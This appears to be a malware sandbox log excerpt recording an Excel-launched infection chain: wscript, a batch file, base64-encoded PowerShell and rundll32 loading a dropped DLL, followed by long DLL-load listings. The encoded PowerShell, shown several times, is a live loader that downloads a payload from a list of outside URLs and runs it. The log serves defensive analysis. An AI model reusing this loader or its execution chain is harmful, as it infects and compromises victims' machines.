Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wscript.exe wscript c:\programdata\wetidjks.vbs	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wscript.exe wscript c:\programdata\wetidjks.vbs	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wscript.exe wscript c:\programdata\wetidjks.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
